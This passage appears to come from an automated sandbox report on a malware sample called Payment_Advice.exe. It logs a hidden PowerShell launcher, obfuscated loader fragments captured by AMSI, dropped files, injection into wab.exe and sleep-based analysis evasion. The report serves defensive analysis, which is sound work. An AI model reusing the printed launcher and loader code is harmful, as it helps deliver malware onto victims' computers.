            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Diodens $Fejlnormerne $Kontrolliniens), (Furfurylidene @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Affrayed = [AppDomain]::CurrentDomain.GetAssemblies(
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Powerboats)), $Taphvirvler).DefineDynamicModule($Kild, $false).DefineType($Ratakslerne, $Punktnedslagenes147, [System.MulticastDelegat
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Mazing=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Fillock161.Sys';$Rejsemontrer=$Mazing.SubString(4669,3);.$Rejsemontrer($Mazing) "
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Mazing=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Fillock161.Sys';$Rejsemontrer=$Mazing.SubString(4669,3);.$Rejsemontrer($Mazing) "Jump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_00406252 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406252
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04E5E61C pushfd ; ret 2_2_04E5E625
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04E5E002 pushfd ; ret 2_2_04E5E021
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0799F63A push edx; iretd 2_2_0799F63B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07999285 pushad ; ret 2_2_07999291
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_028B9C30 push esp; retf 2165h5_2_028B9D55

            Persistence and Installation Behavior

            barindex
            Source: C:\Users\user\Desktop\Payment_Advice.exeFile created: C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Fillock161.SysJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Whereas\Payment_Advice.exeJump to dropped file

            Boot Survival

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnKostaldg Interne,cheirer gulvhjnconcu.ieEpiphytsAscarid/Heroise`$F,erledD SanktbiSubcortsRhes,amk Strik,eGraverir Lbin.tyStdlist]Kle use Tripaln=Tripped SurfendPOpbr,dsiVold,gts Ha.chjsAaledeao Mosegri Buddi,rCa makieKa.danerWarpat, Ddgodbi`$NeutersVOrganisiUn,ssemctelefontVisceraoFl,ngeirLoebetiiAsela,aaHeredolnSocioloe skyl or,raperen Bro.ateavancemsfirling[ Movere`$Timote.IMankoermPiositim Skatt uma cosinB ugerfiSkrmtrosBufagineFladbrnrhydroxyi Fals,nnfournitgAbitureeEeryraar ,anikinSh.oudyeKmpernesPrgtigs/ Tyves `$BoffinsDFredniniCurdlessBesaavakSkovflaeMinnikarImplemeyVaun.mu] lvekil Undeci 2reproba3Raspier9skrksla;Bouleva slosh. Ganoce, Lille,r U.opulr}SynsperProcent`$ ProphlR BullgitUdsletteaarvaagg AculearpolysponLockupvn.andfane klargr=book,es[DallyinS VoldtgtPulterkr pe sdyiLlebrdenUnsolargPapirsp] pansun[Upge.teS OriginyNonherosBrmmeswt Frowsie C,owdimJaevntv. van vrTRedistre Dingiex.eromyrtTeleka.. S abioE projeknMa euvecIliocoso C,rpaidChondr.iFor.angnZi.zagggWhistle]Haemato: Udeneu:KyaniseATilfredS LeadenC fo,sytI,alleriITachjen.SissismGSt afare Gennemt,sonnerSTrottoitIntegrarA.bestoiQurshesnInjur eg Refect( Cataph`$Jurat,dVC,rkingiNa,rendcDatablatLselystoBuckto,rNoctambiDemissiaU,enadlnChiquite arbonirLsrepannKastrate Bek,ftsCesuras)Metapho; ForpasSir.pshiHankns,fPurchas Samurai(Toastbr`$adjunkdI BrdrismErvhystmTand.tauDriftsrnAughtvii Metaphs Momsude ybriderMel nosiOutttorn Catskig r gioneMalerejr Piret,nTermchaeRefus.rsOri,atinDisloyadSvineavhInvers.oBrudstylLoyaltydalbuminsIngaevorSprrersi Maksimg Ma.betttribut )Salvage encrot{Overl,s Upshi tStolthe.Sy.temk(Pendent`$KadettePFetaer,aRetsaktufligedesForgnges Tjlen iSnde.jydTetrahyaforraade ounter)Katego. Fli tin`$ N nspeRInf,atitImbecileRearrayg Cele,erRobotizn .ahognntriorche Unorga;ThermobRegines}Acroti eSemi ralBootablsFlgesygeUd,rads G.vandt{Led,lse;Alkohol.horidg`$AftaletR.oderaatCachaloepersonngPassivdrTroklednNe paganHos.eaneStands ;snitvrk Ledida}Udsv.dn}Cyanfor`$ AnretnTh,vedstaHomatomparealerhSur.ulevMarliesiIndvlgerCitolervTusindklFortyndecopycutr Uopkla=Part tiHGuiltskiBilbrangHold pshf,emtidl Bodyguoirrad aw Trades Ant.me'TronfoeBliteratDSheiker9CrocodyABromdec8Enhorro1.ermies'Pacific;Dioxal.`$Imp.rceH I.tstyePerip.plUrbsvriaHarmonifPrunelltPahlavieSta ensn Buskons Neolibf Assobri cellevlJenvippm Encolo=V sitorHComprisiLurmrkegArbejdshcirrhu lUdenlanoLnf rbewda olin Affrend'CharlybBRhipidoC Svanek9Sibe ic6 Bassan9RundvisCBounde,9NonfarmBBrusure8.ngeridA.orsoni8Villigt2ServiceC Sniffe1 Solsti8Uns.aleB Krater8Clearmi3O ganon8Trusser3 Anti,l'Adresse;bystens`$GaloplbFU,deligimonotoct Del,stzA.aplasw GrafikaChoripetAnoesise Hovedar Antiri=SorehonH FerrariCoostbagPackplahThessallVdr ttwoSkru,skwRhythmd .oodled'indkberAGos.ell2Splayda8Busgade6Higgleh8HypnotiCpiuria.9HomogenDZygosis8Trommes0 Gennem9G,sblusC Elemen8O twait0Rustica8For mte9Dronep 9MineralBHydromeCTilhu,g1 ExternBAkkredi8Tungmet8 pinkel6Porce.n8 Sifflo1ScavageDGrkerenCTransm DKompostDInterflCUnflawe1
            Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI/Special instruction interceptor: Address: 48A47E9
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 28B0000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 21680000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 23680000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599872Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599764Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599547Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599437Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599328Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599219Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599109Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599000Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598891Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598766Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598641Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598531Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598422Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598312Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598203Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598094Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597984Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597875Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597766Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597641Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597516Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597406Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597297Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597186Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597078Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596969Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596859Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596750Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596641Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596516Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596391Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596281Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596172Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596062Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595953Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595844Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595734Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595625Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595515Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595406Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595297Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595187Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595064Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594937Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594828Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594718Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594609Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594500Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5941Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3772Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 1338Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 8509Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 344Thread sleep time: -3689348814741908s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260Thread sleep count: 35 > 30Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260Thread sleep time: -32281802128991695s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260Thread sleep time: -599872s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4124Thread sleep count: 1338 > 30Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4124Thread sleep count: 8509 > 30Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260Thread sleep time: -599764s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260Thread sleep time: -599656s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260Thread sleep time: -599547s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260Thread sleep time: -599437s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260Thread sleep time: -599328s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260Thread sleep time: -599219s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260Thread sleep time: -599109s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260Thread sleep time: -599000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260Thread sleep time: -598891s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260Thread sleep time: -598766s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260Thread sleep time: -598641s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260Thread sleep time: -598531s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260Thread sleep time: -598422s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260Thread sleep time: -598312s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260Thread sleep time: -598203s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260Thread sleep time: -598094s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260Thread sleep time: -597984s >= -30000sJump to behavior
